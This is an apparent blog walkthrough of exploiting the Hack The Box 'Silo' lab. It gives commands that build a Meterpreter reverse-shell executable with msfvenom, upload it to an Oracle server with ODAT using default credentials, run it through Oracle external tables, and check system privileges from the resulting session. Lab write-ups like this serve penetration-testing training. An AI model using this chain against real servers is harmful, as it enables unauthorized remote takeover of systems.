I would like to continue the last article about hacking Silo from hack the box PenTest box.
The last steps that we have done is the recon and enumeration phase of the penetration testing. So that we can continue with exploitation in order to gain access to the server.
We have the user and password from the last enumeration so that we can continue to exploit the server in order to gain access.
ODAT has the capability of delivering the malware to the system by accessing the capability of oracle to write a file to the system. Lets first make the exploit using msfvenom with the command below
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.73 lport=4545 -f exe > rio.exe
Lets start delivering the malware to the server using ODAT using utlfile functionality as below
So the command will look as below
/odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE –sysdba –putFile
c:/ rio.exe rio.exe
Okay we have successfully deliver our exploit to the server using the oracle write file function. we put the malware on C:/rio.exe
Now we can invoke the malware using the capability of oracle to load external table to run executable. But before we can execute the exploit let make the reverse handle using metasploit multi handler
After we have created the reverse handler then we can now invoke the exploit at the remote server. We can use ODAT command as below
./odat.py externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE –sysdba c:/ rio.exe
After the ODAT has successfully execute the remote exploit we can now check the reverse handler in the metasploit that there should be one session created like below image
We can now start interacting with the established session using command
session -i 1 (1 is the session id)
meterpreter provide a lot functionality that you can use on the post exploitation, you can just type help in the meterpreter session
for example we can check who we are in the target system by using below command
meterpreter > getuid
We can see from the above picture that we are at the highest privilege account at the server that you can also query the list of privileges that you have by using this command
meterpreter > getprivs
OK that is all about the lab. finally we can hack the server and get the highest privilege. I will show you another technique that is a bit manual work but also effective for some exploitation technique in the next post.